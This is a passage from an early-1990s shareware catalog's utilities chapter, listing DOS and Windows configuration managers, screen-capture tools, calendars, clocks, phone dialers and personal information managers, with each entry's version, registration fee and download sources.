do, but it + goes far beyond the capabilities of the DOS batch language. + Can run Windows and DOS programs, send keystrokes to Window + applications, prompt users for input using an assortment of + dialog boxes, make branching decisions, and much more. + + Chapter 2, "Utilities" 70 + + + + 2.5.5 Configuration utilities + + Product: AutoCon [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Larry Weaver, 916-623 5045 + Registration: $15.00 + Version: 2.0g (03-14-92) + User benefits: At least one year of voice/BBS support. + Look for: AUTOCON.ZIP on BBSs (call 916-623 4455 to download it + at no charge); AUTOCN.ZIP in IBMSYS forum LIB 1 on CompuServe; + AUTOCON.ZIP in IBMPC RTC LIB 0 on GEnie. + Download size: 130k + Description: + Full interactive (internal and/or external editor, pull down + menus, mouse support, and context sensitive help) or command + line AUTOEXEC.BAT and CONFIG.SYS configuration management. Can + use current configuration files. Provisions for disk cacheing + software. MENU.CTL device driver allows configuration + selection during boot process. Handles all of the nitty-gritty + details for you. See Nov. 13, 1990 PC Magazine p. 50 for a + review of previous version. + + Product: BOOT.SYS + Needs: IBM PC, DOS 2.11 or better. MS-DOS or IBM PC-DOS, + including version 5.00; may not work with DOS clones. + Author: Hans Salvisberg + Registration: $39.00 + Version: 1.42 (07-03-91) + User benefits: current disk, printed and bound manual; email + (CompuServe [73237,3556], Internet) and mail support; + registration transferable to future shareware versions. + Look for: BOOT142.EXE on BBSs; BOOT14.EXE in IBMSYS forum LIB 1 + on CompuServe. + Download size: 83k + Description: + Makes it possible to display one or more menus at boot-up time + and to have different parts of CONFIG.SYS and/or AUTOEXEC.BAT + executed, depending on which menu option(s) are chosen. No more + editing/renaming your start-up files and rebooting. Up to 9 + options per menu, up to 25 consecutive and/or nested menus. + Easy installation, detailed examples for every level of + sophistication. Full support for MS/PC-DOS 5.00. + + Chapter 2, "Utilities" 71 + + + + Product: BootMaster [***] + Needs: IBM PC, DOS 3.0 or better. + Author: RoSi Software, 011-49-30-744-7707 + Registration: $20.00 + Version: 3.0 (01-01-92) + User benefits: Unlimited support; no screen reminder on booting. + Look for: availability unknown on BBSs; BOOTMA.EXE in IBMSYS + forum LIB 2 on CompuServe. + Download size: 207k + Description: + This configuration manager lets you select different + environments. It's very easy to use and it does NOT manipulate + the boot partition table, a matter I think many users else + would be a bit nervous about. It's possible to activate a boot- + up module, allowing you to pick a choice at boot time. + + Product: DasBOOT! [***] + Needs: IBM PC, DOS 2.0 or better. + Author: WHEEL Games + Registration: $5.00 + Version: 1.30 (02-07-92) + User benefits: 90 days support. + Look for: availability unknown on BBSs; DASBOT.ZIP in FSFORUM + forum LIB 13 on CompuServe. + Download size: 45k + Description: + This menu program lets the user select between several sets of + CONFIG.SYS and AUTOEXEC.BAT files. A very handy utility + program to help you get the maximum amount of memory for using + flight simulators or other memory hungry programs and then + allows an easy way to restore your normal day-to-day + configuration. + + Product: HiMOVE + Upper Memory Manager. See full description on page 40. + + Product: Nifty James' RAM Disk + RAM Disk Device Driver for EMS and XMS memory. See full + description on page 40. + + Product: Painless Event Processor + Event Scheduler to allow your PC to work 24hr. See full + description on page 66. + + Chapter 2, "Utilities" 72 + + + + Product: PC-INFO + Needs: IBM PC, DOS 2.0 or better. + Author: Cheat River Engineering, 201-627-5460 + Registration: $15.00 + Version: 2.17 (05-27-91) + User benefits: Most current version mailed; voice & CIS support; + free updates. + Look for: PC-217.ZIP on BBSs (call 207-766-2467 to download it at + no charge); PCINFO.EXE in IBMHW forum LIB 4 on CompuServe. + Download size: 32k + Description: + Displays operating system & hardware configurations; including + Intel & Weitek coprocessors.Especially useful when supporting + multiple systems. Reports copyright text found in ROM BIOS + code, handy in determining BIOS source and clone + manufacturers.All video adaptor types are recognized & handled + automatically.Supports DOS 4/5 disk partitions>32Mb, inc. + networked drives. Self-extracting archive. Eng. design serv./ + mech.prototype constr./contract CAD/custom SW dev. our + specialty. + + Product: SHERLOCK + A dual window ASCII file comparison utility. See full + description on page 38. + + 2.5.6 Recovery utilities + + Product: Btr Help! + Btrieve File Utility. Repair, Edit, Browse. See full + description on page 275. + + Product: HDTEST + Thorough Read/Write hard/floppy disk test. See full + description on page 17. + + Product: Integrity Master(tm) [***] + Easy to use anti-virus/data integrity prog. See full + description on page 108. + + Product: An Ounce Of Prevention + Disaster-prevention/data-protection system. See full + description on page 106. + + Product: Professional Master Key + Unerase, hex editor, unformat, disk map, etc. See full + description on page 20. + + 2.5.7 Screen capture + + See also: Utilities, Printer utilities (page 43). + + Chapter 2, "Utilities" 73 + + + + Product: Capbuf [***] + Needs: IBM PC, DOS 2.1 or better. + Author: Cascoly Software, 206-523-6135 + Registration: $30.00 + Version: 1.41 (12-28-90) + User benefits: Phone/CompuServe support. + Look for: availability unknown on BBSs; CAPBUF.ZIP in IBMSYS + forum LIB 3 on CompuServe. + Download size: 40k + Description: + A memory resident (TSR) program that lets you capture any text + screen and save it for later processing or printing. It's quite + useful for programs that do not otherwise provide means of + printing their results: such as intermediate results of games, + or collecting copies of messages while on a bulletin board. + Also includes a filter to remove line drawing characters. + + Product: Textshot [***] + Needs: IBM PC, DOS 2.1 or better. + Author: McAdams Associates + Registration: $25.00 + Version: 2.1 (01-23-92) + User benefits: Master disks, one year phone/CompuServe/mail + support, bonus utilities. + Look for: TSHOT21.ZIP on BBSs; TSHOT2.ZIP in IBMSYS forum LIB 3 + on CompuServe. + Download size: 27k + Description: + This TSR pop-up program saves images of any 80-column text + screen to monochrome .PCX-format files. Ideal for developers! + Works with all common video standards. Features image + clipping, switchable fonts, image inversion and color patterns. + Easily removed from memory, and all disk operations are error- + protected. + + 2.5.8 Other + + Product: ClipMate for Windows + Captures Multiple Clipboard Text Items. See full description + on page 85. + + Product: Dupes + Finds duplicate/empty files & empty dirs. See full description + on page 27. + + Chapter 2, "Utilities" 74 + + + + Product: Except + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Version: 2.00 (06-15-91) + User benefits: Eligibility for free upgrades. + Look for: EXCED200.ZIP on BBSs; EXCED2.ZIP in IBMSYS forum LIB 3 + on CompuServe. + Download size: 18k + Description: + Temporarily protects files by making them inaccessible to most + DOS commands, programs, and batch files. Use it to protect + sensitive files, or to affect some, but not all, files in a + directory. For example, to see all files in the current + directory except those ending in DOC, you'd enter EXCEPT *.DOC + DIR. To hide a certain file from a word processor, you could + enter EXCEPT SECRET.DOC WP. + + Product: Globally + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Version: 1.22 (06-09-91) + User benefits: Eligibility for free upgrades. + Look for: GLOBD122.ZIP on BBSs; GLOBL1.ZIP in IBMSYS forum LIB 3 + on CompuServe. + Download size: 18k + Description: + Executes a command or program in multiple directories. It can + execute in all directories on a disk, or in just the current & + subordinate directories. For example, to delete all files on + your disk with an extension of BAK, you would enter GLOBALLY + DEL *.BAK. + + Product: Globally/2 + Needs: IBM AT (80286), OS/2 1.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Version: 1.11 (07-06-91) + User benefits: Eligibility for free upgrades. + Look for: GLOBO111.ZIP on BBSs; GLOB01.ZIP in IBMSYS forum LIB 2 + on CompuServe. + Download size: 18k + Description: + Executes a command or program in multiple directories. It can + execute in all directories on a disk, or in just the current & + subordinate directories. For example, to delete all files on a + hard disk with an extension of BAK, you would enter GLOBALLY + DEL *.BAK. + + Product: Renamer + Renames directories. See full description on page 22. + + Chapter 2, "Utilities" 75 + + + + Product: Renamer/2 + Renames directories. See full description on page 22. + + Product: SAFEPACK [***] + Disk defragmenter with data safety features. See full + description on page 9. + + + 2.6 Desktop utilities + + Product: Browse/2 + OS/2 file viewer for ASCII and hex data. See full description + on page 39. + + 2.6.1 Multi-function + + Product: dLITE + Memory-res dBASE-Compat Desktop File Manager. See full + description on page 140. + + Product: Duplicate File Locator (DFL) + Prcss dups in&out ALL arcs,disks. Many modes. See full + description on page 15. + + Product: Programmer's Productivity Pack + Productivity Tools for Programmers. See full description on + page 260. + + Product: WinPost + Needs: IBM PC, Windows 3.0 or better. + Author: Eastern Mountain Software, 614-798-0910 + Registration: $30.00 + Version: 3.1a (09-18-91) + User benefits: Printed manual, technical support, latest version + on disk. + Look for: availability unknown on BBSs; WPST31.ZIP in WINADV + forum LIB 11 on CompuServe. + Download size: 73k + Description: + Get rid of your Post-it(tm) notes! This Windows utility allows + the user to create and manage reminder notes. Icon Tool Bar, + mouse shortcuts and accelerator keys make this a very intuitive + and easy-to-use utility. Major features include print + facility, search facility, alarm notes, numerous configuration + parameters, auto save, and more. Selected as one of "Powerhouse + Utilities for Under $50" by PC World magazine (7/91). A must + for Windows users! + + Product: Zephyr + FoxPro-Compatible DBMS for Non-Programmers. See full + description on page 140. + + Chapter 2, "Utilities" 76 + + + + 2.6.2 Calculators + + Product: AFFORD IT??? + Monetary calculator (annuities,savings,loans). See full + description on page 230. + + Product: CALC_JNC [***] + Needs: IBM PC, DOS 3.0 or better. + Author: James N. Cox + Registration: $25.00 + Version: 8.24 (02-24-92) + User benefits: Printed manual, master disk, phone/CompuServe/mail + support, 30-day money back. 80x87 Support. Bonus utilities. + Look for: CALJNC.ZIP on BBSs (call 215-721-0363 to download it at + no charge); CALJNC.ZIP in IBMPRO forum LIB 6 on CompuServe. + Download size: 32k + Description: + Programmers mode: Does automatic conversions between + DEC,HEX,OCT and BINARY. Other functions are + MOD,AND,NAND,OR,NOR,XOR,NOT,NEGATION, and 10 RESULT MEMORIES + + Floating point mode: Always displays last formula entered. + Functions include SQR + ROOT,ROOT,CUBE,SIN,COS,TAN,HYPERBOLICS,LOG'S,PI, + FRACTION,FACTOR,INT,ABS,SEXAGESIMAL,10 RESULT/PREVIOUS + MEMORIES, and FIXED POINT and more. + + Features in both modes: TSR Option, Colors, 80-132 Columns, + send result to keyboard buffer. + + Product: InstaCalc + Pop up (TSR) spreadsheet (less than 15K RAM). See full + description on page 135. + + Product: MORSOFT CALCULATOR + Needs: IBM PC, DOS 2.1 or better. 256k RAM. + Author: MORSOFT, 512-561-0731 + Registration: $14.95 + Version: 2.0 (07-01-89) + User benefits: Printed manual, phone support. + Look for: availability unknown on BBSs; MORCAL.ZIP in IBMSYS + forum LIB 7 on CompuServe; MORCALC.ZIP in IBMPC RTC LIB 5 on + GEnie. + Download size: 74k + Description: + Calculate in style. A business calculator/adding machine with + the functions of add, subtract, multiply, percent, divide and + trigonometric functions. Also a memory constant feature and sub + and overall totals. All operations may be performed in decimal + or HEX. The main advantage however is the 1,000 entry "paper + tape" that is displayed on the screen and may be scrolled + forward or back, changed, and printed. + + Chapter 2, "Utilities" 77 + + + + 2.6.3 Calendars + + Product: ActCalendar + Needs: IBM PC, DOS 3.0 or better. + Author: ShareGames, 619-283-0472 + Registration: $15.00 + Version: 2.5 (01-22-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: ACTCLDR.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 98k + Description: + Can be used in conjunction with ActMenu, or as a stand-alone + program, to display over 1,000 of your scheduled events over a + four year span. Initially it displays six months with the + current month at top center. All Holidays and your scheduled + event days are highlighted. Dates may be selected with cursor + keys or mouse to display and/or edit the events. A week panel, + which displays up to 5 events, and a day panel for 10 events + are available. + + Product: Ample Notice + Needs: IBM PC, DOS 2.0 or better. + Author: Granny's Old-Fashioned Software, 704-264-6906 + Registration: $30.00 + Version: 2.04 (05-21-91) + User benefits: Current disk and manual, future update, technical + support. + Look for: availability unknown on BBSs; AN204.ZIP in IBMSYS forum + LIB 7 on CompuServe; AN204.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 141k + Description: + An appointments calendar/alarm clock package that can help + organize your life. Appointments and notes are entered 'free- + form'. You can easily record: + * birthdays (with ages updated each year) + * a meeting every other Tuesday at 4:00 for 5 meetings + * Father's Day (third Sunday in June) + * many other date patterns. + Appointments automatically set a 'pop-up alarm clock'. + Printouts can be obtained in many print styles for reference + away from your computer. + + Product: APCAL [***] + Personal Calendar / Time Management Program. See full + description on page 90. + + Chapter 2, "Utilities" 78 + + + + Product: Calendar Keeper + Needs: IBM PC, DOS 3.0 or better. Hard disk recommended. + Author: Dataphile Software, 616-327-7811 + Registration: $33.00 + Version: 3.0a (02-02-91) + User benefits: Printed manual, master disks, phone support. + Look for: availability unknown on BBSs; CAL30.EXE in IBMAPP forum + LIB 7 on CompuServe. + Download size: 350k + Description: + A calendar database program which maintains up to 10 separate + calendar database files. It supports 5 event types: Permanent; + Current-Year-Only; Consecutive days (or business days); Every + 'n' days (or business days); and Monthly on Day-of-Week. + Calendar Keeper has 3 report formats: Monthly- Wall-Calendar; + Week-at-a-Glance; Year-at-a-Glance. Utility included to create + print driver for any printer (7 common print drivers included). + + Product: Calendar Mate + Needs: IBM PC, DOS 3.0 or better. 384k RAM. + Author: Hawk Software, 306-543-8899 + Registration: $25.00 + Version: 4.1 (06-01-91) + User benefits: Unlimited support; current release automatically + shipped. + Look for: CALMATE4.ZIP on BBSs (call 306-777-4493 to download it + at no charge); CALMT4.ZIP in IBMSYS forum LIB 7 on CompuServe. + Download size: 165k + Description: + A full featured calendar program that is extremely user + friendly and flexible. Its major distinctives are its ability + to print daily, monthly and yearly calendars and its + flexibility in defining repeating events. Many different + intervals may be specified such as 'annually' or 'last workday + of the month'. Different events files may be easily maintained + and calendars may be printed in English, Spanish, French or + German. A fine, inexpensive calendar program. + + Product: Calendar Wise [***] + Needs: IBM PC, DOS 3.0 or better. Hard drive, VGA or EGA + monitor, 512K. + Author: BLUE CANNON SOFTWARE, 704-398-0850 + Registration: $30.00 + Version: 1.0 (01-25-92) + User benefits: Printed manual, master disks, phone/fax/ + CompuServe/mail support. + Look for: availability unknown on BBSs; CWISE1.ZIP in IBMAPP + forum LIB 7 on CompuServe; CWISE10.ZIP in IBM PC RTC LIB 3 on + GEnie. + Download size: 210k + Description: + Calendar Wise is a multi-subject planner/tracker that simulates + a desktop blotter or popular write-on/wipe-off wall calendar. + It looks just like a large desktop calendar on your screen. 100 + + Chapter 2, "Utilities" 79 + + + + calendars allow you to keep different planning and tracking + separate. Multiple calendars can be referenced at once to view + or print together. Calendar format can be changed to view 1-25 + weeks(VGA). Unlimited users on a LAN. Schedule information! + Track Information! See information! Give this one a look! + + Product: DARN! Don't Forget! [***] + Non TSR Annual Events Reminder. See full description on + page 86. + + Product: DayMaster + Needs: IBM PC, DOS 2.1 or better. Hard disk or high denisty + disk. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Version: 3.70a (11-10-91) + User benefits: Master disks, phone/BBS/mail support. A personal + event added to the permanent data file. Shareware disks of + other programs. + Look for: DAYM370A.ZIP on BBSs (call 317-784-2147 to download it + at no charge); DAYMST.ZIP in IBMSYS forum LIB 7 on CompuServe. + Download size: 170k + Description: + Provides User with trivia,birthdays, anniversaries for a + particular date, AND allows User to include their own + information for any date. It also gives a quote for the day, + and informs User of any Reminders the User might have entered. + Reminder feature works for Weekly/Monthly/Daily/ Annual/Single + or Range of dates basis. All of this can take place at boot up + or any other time User activate the program. The permanent data + file contains over 2500 historical events and 500 quotes. + + Product: Early Bird + Needs: IBM PC, DOS 2.1 or better. + Author: Allan Computer Products, 913-384-5725 + Registration: $30.00 + Version: 1.0f (08-17-91) + User benefits: Bound manual, Current version diskette, Phone/FAX/ + newsletter support. + Look for: EB10*.ZIP on BBSs (call 303-933-0701 to download it at + no charge); EB10F.ZIP in IMBSYS forum LIB 7 on CompuServe; + EB10F.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 190k + Description: + The best user-friendly, full-featured reminder program + rd + available. It features simple or complex reminders (e.g., 3 + th + from last Thurs of every 9 month), desktop calendar & scan + (AUTOEXEC) modes, color pull-down & pop-up menus, context + sensitive on-line help, alarm, DOS shell, mouse support, file + commands, & selectable group printing. Also has user definable + classes, notice, print/display options and many special + effects. + + Chapter 2, "Utilities" 80 + + + + Product: Easy Access + Professional Menu System w Calendar. See full description on + page 94. + + Product: InContext + DOS shell+, based on principles of human work. See full + description on page 106. + + Product: Mayan Calendar [***] + Converts Mayan/modern calendar dates. See full description on + page 350. + + Product: MENU ACE + PC menu, datebook, calendar system. See full description on + page 97. + + Product: Names & Dates + Address Book, Calendar, Mailing Label combo. See full + description on page 88. + + Product: On This Day + "What Happened On This Day in History?" See full description + on page 298. + + Product: ORGANIZE + Needs: IBM PC, DOS 2.1 or better. IBM Graphics, Epson, or HP + Laserjet printer. + Author: David H. Pritchett + Registration: $25.00 + Version: 2.12 (05-16-91) + User benefits: Printed manual. + Look for: ORG212.ZIP on BBSs (call 912-471-7629 to download it at + no charge); ORG212.ZIP in IBMSYS forum LIB 7 on CompuServe. + Download size: 64k + Description: + An efficient, easy to use personal appointment calendar + designed for those who must keep up with appointments and other + future events. Memos, appointments, and events are entered + through a full screen editor and may be previewed in a WYSIWYG + view prior to printing. Features on-line context sensitive + help, pop-up windows, and a tickler to remind you of important + events. A calendar is printed in full page format with events + listed in each day's block. + + Product: Personal Calendar (PC) for DOS [***] + TSR PIM Appointment Reminder, Clock, Calendar. See full + description on page 88. + + Product: Tikler + Quick, easy, appointment/event reminder. See full description + on page 89. + + Chapter 2, "Utilities" 81 + + + + Product: What's Up(tm) + Needs: IBM PC, DOS 2.0 or better. + Author: Nassib Nassar + Registration: $20.00 + Version: 1.31 (06-02-91) + User benefits: Disk with latest version, one year support by + mail, future updates at nominal charge. Overseas postage: add + $4.00. Registration only: $15. + Look for: availability unknown on BBSs; WATSUP.ZIP in IBMSYS + forum LIB 7 on CompuServe; WHATSUP.ZIP in IBMPC RTC LIB 5 on + GEnie. + Download size: 50k + Description: + An easy-to-use reminder and calendar program that features + flexible date specification (recurring dates and days-of-the- + week, and wild-card dates), advance display of messages, + selection of US or European date formats, calendar in 5 + languages, and multiple message files. Program allows display + of messages for any date input by user, search of message file + for a string, and display of "missed" messages (if program was + not run on the day message was due). + + 2.6.4 Clocks + + Product: CLOCK [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Gamma Software, 303-667-9960 + Registration: $10.00 + Version: 2.00 (01-10-92) + User benefits: Master disks. + Look for: CLOCK200.ZIP on BBSs; CLOCK2.ZIP in IBMNET forum LIB 7 + on CompuServe; CLOCK200.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 25k + Description: + This memory resident (TSR) program continuously displays the + day of the week, date and time on the screen. The clock can be + turned on and off with a user specified hot-key. The color and + position of the clock can also be configured. The program takes + up approximately 2k of memory when loaded. + + Chapter 2, "Utilities" 82 + + + + Product: PCCLOCK + Needs: IBM PC, DOS 2.1 or better. CGA monitor; 1200 baud modem. + Author: Michael J. Sadaway + Registration: $10.00 + Version: 2.14 (04-30-91) + User benefits: One-time registration, printed manual, master + disks, CompuServe/GEnie/mail support. + Look for: PCCLK214.ZIP on BBSs; PCK214.ZIP in IBMSYS forum LIB 1 + on CompuServe; PCCLK214.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 77k + Special instructions: Product distribution restricted to the + United States. + Description: + Sets your PC's date and time quickly, conveniently, and + accurately by modem by calling the atomic clock at the National + Institute of Standards and Technology (formerly the National + Bureau of Standards) in Boulder, Colorado. Also an attractive + digital clock, PCCLOCK displays the date and time in big digits + in any of 80 colorful built-in designs plus up to 20 you create + yourself. Features manual as well as automatic setting, 6-digit + 12- or 24-hour display, Big Ben chime, and alarm. + + Product: Personal Calendar (PC) for DOS [***] + TSR PIM Appointment Reminder, Clock, Calendar. See full + description on page 88. + + 2.6.5 Phone dialers + + See also: Communications, Call logging & analysis software + (page 165). + + Product: DialThat + Needs: IBM PC, DOS 2.0 or better. Modem on either serial port + COM1 or COM2. + Author: Real Software, 408-476-3550 + Registration: $10.00 + Version: 1.03 (02-01-91) + User benefits: Latest disk, support. + Look for: DIALT1.ZIP on BBSs (call 408-476-3550 to download it at + no charge); DIALT1.ZIP in IBMCOM forum LIB 2 on CompuServe; + DIALT103.ZIP in IBMPC RTC LIB 6 on GEnie. + Download size: 5k + Description: + A resident program to select a phone number on the screen, and + to dial it on the modem. Uses about 2k RAM. Requires the + screen to be in text mode. + + Chapter 2, "Utilities" 83 + + + + Product: Easydial + Needs: IBM PC, DOS 2.0 or better. Modem. + Author: Patri-Soft, 714-352-2820 + Registration: $20.00 + Version: 3.6 (07-10-91) + User benefits: Latest version, BBS access and future updates. + Money Back Gurantee. + Look for: ED36.ZIP on BBSs (call 714-352-2825 to download it at + no charge); ED36.ZIP in IBMCOM forum LIB 6 on CompuServe; + ED36.ZIP in IBMPC-615 RTC LIB 5 on GEnie. + Download size: 65k + Description: + A very easy phone dialer. Just type its name. You can enter + any number of names and phone numbers to its database. To call + a Jackie Smith, just type ED JACKIE if JACKIE SMITH is the only + JACKIE in the file. Supports special phone systems where you + must dial a special number first, a phone log, credit card + calling and more. + + Product: fastmenu GOLD + Graphics User Interface (GUI), Menu System. See full + description on page 104. + + Product: HDM IV - Hard Disk Menu + DOS Menu & Security System, Network Support. See full + description on page 96. + + Product: Little Black Book + Needs: IBM PC, DOS 2.0 or better. EGA monitor, hard disk. Modem + optional. + Author: GTX Software, 213-257-2704 + Registration: $20.00 + Version: 1.41 (12-12-91) + User benefits: Free upgrades for one year. + Look for: LBB.ZIP on BBSs (call 414-789-4352 to download it at no + charge); LBB.ZIP in ZNT:TIPS forum LIB 0 on CompuServe. + Download size: 64k + Description: + LBB is a full featured address book manager. You can maintain + personal and business records, limited only by available disk + space. LBB will function as a telephone dialer also. QuickDial + feature allows for dialing a number on startup. LBB will print + a pocket sized directory that can easily be carried with you. + Context sensitive help available at the touch of a key. + + Product: NAMEBASE [***] + Name/Address/Notes database w/mouse support. See full + description on page 201. + + Product: Names & Dates + Address Book, Calendar, Mailing Label combo. See full + description on page 88. + + Chapter 2, "Utilities" 84 + + + + Product: Painless Menu Manager + Menuing system for Hard Disks. See full description on + page 98. + + Product: PC-Names + Combination Mail List manager, address book. See full + description on page 144. + + Product: PCFDial + Needs: IBM PC, DOS 2.0 or better. Hard disk; Hayes modem. + Author: Barn Owl Software, 618-632-7345 + Registration: $19.00 + Version: 1.04 (01-22-92) + User benefits: Printed manual; 31/2' & 51/4' master disks; 30-day + return policy, no questions asked; one year of voice/fax/ + newsletter support. + Look for: PCFD-104.ZIP on BBSs; PCFDIL.ZIP in IBMSYS forum LIB 7 + on CompuServe; PCFD-103.ZIP in IBMPC RTC LIB 0 on GEnie. + Download size: 150k + Description: + Winner of Public Brand's 1991 awards for useful software! + + This 7k swapping TSR dials voice phone numbers displayed by + other programs (such as database software). Can dial "vanity" + numbers like 800-IBM-DISK or numbers split apart on separate + lines. Keeps a log of calls and displays the local time for + each area code. Pops up at regular intervals to let you know + how long you've talked (useful for salesmen who must "close the + deal" in a set amount of time). Context sensitive help. + + Product: Public Address [***] + High-performance compact Address database. See full + description on page 146. + + Product: STAFF-DIAL + Needs: IBM PC, DOS 3.0 or better. 640k RAM, Hayes modem, hard + disk. Extended/expanded memory recommended. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $39.00 + Version: 2.0 (01-01-91) + User benefits: Printed manual, latest version of program, phone + support. + Look for: availability unknown on BBSs; STFDIA.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 260k + Special instructions: Product distribution restricted to the + United States. + Description: + Allows dialing any telephone number stored in a DBF file. The + program is developed for the German telephone system, however + it can be used anywhere if a Hayes compatible modem is + installed. Features: unlimited size of telephone directory + (limited by hard disk storage), fast find of indexed + information (any field can be indexed), file name and column + + Chapter 2, "Utilities" 85 + + + + for dialing can be set up as default, time & cost control, + every call can be registered to a log file, can operate as TSR, + call scheduling... + + Product: WAMPUM + Menu-Driven dBASE-Compat. DBMS in a 20K TSR. See full + description on page 139. + + 2.6.5.1 Rolodex programs + + Product: ActMenu + Custom menus w/reminders, phone dir & dialer. See full + description on page 92. + + Product: dbDIAL(tm) + Needs: IBM PC, DOS 2.0 or better. Hard disk, 640k RAM. Hayes + modem recommended. + Author: ZPAY Payroll Systems, Inc., 813-866-8233 + Registration: $49.00 + Version: 1.02 (01-06-92) + User benefits: Printed manual, master disks, one year mail + support, 900# phone support. + Look for: DBD-?.ZIP (multiple files) on BBSs; DBD-?.ZIP in IBMAPP + forum LIB 6 (multiple files) on CompuServe; DBD-?.ZIP in IBM + RTC LIB 0 (multiple files) on GEnie. + Download size: 490k + Description: + This 7k TSR database dials the phone, logs your calls, reminds + you when to make a call, pastes an address into your word + processor plus much more! Has hooks into the GRAB Plus(r) + program for printing envelopes and has a built in mail merge + system. + + 2.6.6 Alarms + + Product: Ample Notice + Very flexible appointment scheduler/alarm. See full + description on page 77. + + Product: APCAL [***] + Personal Calendar / Time Management Program. See full + description on page 90. + + Product: Personal Calendar (PC) for DOS [***] + TSR PIM Appointment Reminder, Clock, Calendar. See full + description on page 88. + + Chapter 2, "Utilities" 86 + + + + 2.6.7 Notepads + + Product: ClipMate for Windows + Needs: IBM PC, Windows 3.0 or better. + Author: Chris Thornton + Registration: $20.00 + Version: 1.11 (02-13-92) + User benefits: Master disks, 90-day support. + Look for: availability unknown on BBSs; CLIPMT.ZIP in IBMSYS + forum LIB 4 on CompuServe. + Download size: 92k + Description: + Captures all text items that appear on the Windows Clipboard + and keeps them for later retrieval. There are many functions + to help you retrieve and manipulate clipboard data, such as + Concatenate, Re-Flow Paragraph, Word Find, and Magnify. You can + edit the clipboard data, and you have configurable options for + short-term and long-term storage. The ultimate Windows power + tool, with easy-to-use Icon Ribbon, and Windows Help. + + Product: Painless Menu Manager + Menuing system for Hard Disks. See full description on + page 98. + + Product: Technical Editor + DOS/OS2 Programmers/Text editor (VIRTUAL). See full + description on page 120. + + 2.6.8 Personal information managers (PIMs) + + Product: CALendar preview for SideKick 2 + CALSK2-Sidekick 2.0 Calendar Preview Utility. See full + description on page 110. + + Product: CALendar RePorT for SideKick+ + Formatted Calendar Reporting Program for SK+. See full + description on page 110. + + Product: CALendar report for TRaVel + Traveling Sidekick Reports from Sidekick Plus. See full + description on page 111. + + Product: Calendar Wise [***] + Multi-Subject Planner, Desktop Calendar. See full description + on page 78. + + Chapter 2, "Utilities" 87 + + + + Product: DARN! Don't Forget! [***] + Needs: IBM PC, DOS 2.1 or better. + Author: EmmaSoft, 607-533-4685 + Registration: $10.00 + Version: 3.00 (07-12-90) + User benefits: Printed manual, master disks, support. + Look for: DARN3.ZIP on BBSs (call 607-533-7072 to download it at + no charge); DARN3.ZIP in IBMSYS forum LIB 7 on CompuServe; + DARN3.ZIP in IBMPC RTC LIB 0 on GEnie. + Download size: 96k + Description: + This small program has one purpose: to remind you of events + that occur on the same day each year. Great for remembering + birthdays, anniversaries, tax payments, mortgage payments, car + inspections, and more. Simple to use - you can set it to only + appear once a day, or each time you boot your computer. You + choose how many days ahead you want to be warned of events. Up + to 300 events per file, search, easy to maintain lists, prints + and exports events lists. + + Product: dbDIAL(tm) + 7k TSR Database/Dialer. See full description on page 85. + + Product: FlexBase + Create database, reports, letters, labels. See full + description on page 200. + + Product: Home Helper + Needs: IBM PC, DOS 3.0 or better. Hard disk recommended. + Author: Torbert Data Systems, INC., 804-488-5506 + Registration: $15.00 + Version: 1.3 (11-09-91) + User benefits: Support BBS, updated copy of software, copy of + another program sent. + Look for: 804-488-4146 on BBSs (call 804-488-5506 to download it + at no charge); HH13.ZIP in IBMAPP forum LIB 7 on CompuServe; + HH13.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 300k + Special instructions: Product distribution restricted to the + United States. + Description: + Maintain an electronic phone book, organize recipes, audio and + video tape libraries, home appliance inventory and much more. + Program includes a nice appointment schedular. There is even a + place to store information on credit cards should they become + lost or stolen. This one is becoming very popular. + + Product: HouseHold TRACKER + Inventory items around the house. See full description on + page 137. + + Product: InContext + DOS shell+, based on principles of human work. See full + description on page 106. + + Chapter 2, "Utilities" 88 + + + + Product: NAMEBASE [***] + Name/Address/Notes database w/mouse support. See full + description on page 201. + + Product: Names & Dates + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: WR Software, 415-930-0369 + Registration: $25.00 + Version: 4.2 (04-26-91) + User benefits: Printed documentation, free upgrade, telephone (or + mail) support, future upgrade notification, vinyl address book + cover. + Look for: ND42*.ZIP (multiple files) on BBSs (call 415-937-0156 + to download it at no charge). + Download size: 400k + Description: + Prints pocket-size (and larger) address books, prints wall-type + calendars with user dates (2 sizes), date reminder alarms + (birthdays, etc.), phone autodialing (long distance prefix, + local area code, letter translation, call duration), mailing + labels (10 formats, incl. laser, 1-4 across), Rolodex cards (2 + sizes), sort by name or Zip, 9 diff. reports, print envelope + addresses (laser too, optional return), 5-line 33 character + address area, unlimited names, large NOTES area, context + sensitive help. + + Product: ORGANIZE + Personal Appointment Calendar. See full description on + page 80. + + Product: Personal Calendar (PC) for DOS [***] + Needs: IBM PC, DOS 2.1 or better. DOS 3.0 or better if used as a + TSR. + Author: FunStuff Software, 703-435-1110 + Registration: $35.00 + Version: 14.41 (03-10-92) + User benefits: Printed manual, master disks, phone/BBS/mail + support, various product discounts. + Look for: PC1441.ZIP on BBSs (call 703-323-6423 to download it at + no charge); PC1441.ZIP in IBMSYS forum LIB 7 on CompuServe. + Download size: 191k + Description: + Friendly Personal Information Manager (PIM) displays a 3-month + scrollable calendar, a running analog/digital clock, a time- + oriented event list of your appointments, and your notes. + Printable for pocket/purse. Keeps a historical diary. Warnings + and alarms tell when events are pending or overdue. Flexible + menu interface as a TSR or normal program. TSR can interrupt + you at the earliest event. Extremely stable, environment + sensitive TSR is a 6K byte kernel, with the balance swapped to + EMS or disk. + + Chapter 2, "Utilities" 89 + + + + Product: PopDBF + 4K TSR for "Instant Access to X-Base Files" See full + description on page 150. + + Product: Resident Task Manager + Needs: IBM PC, DOS 2.1 or better. 150k RAM. + Author: WetZoft Applications, 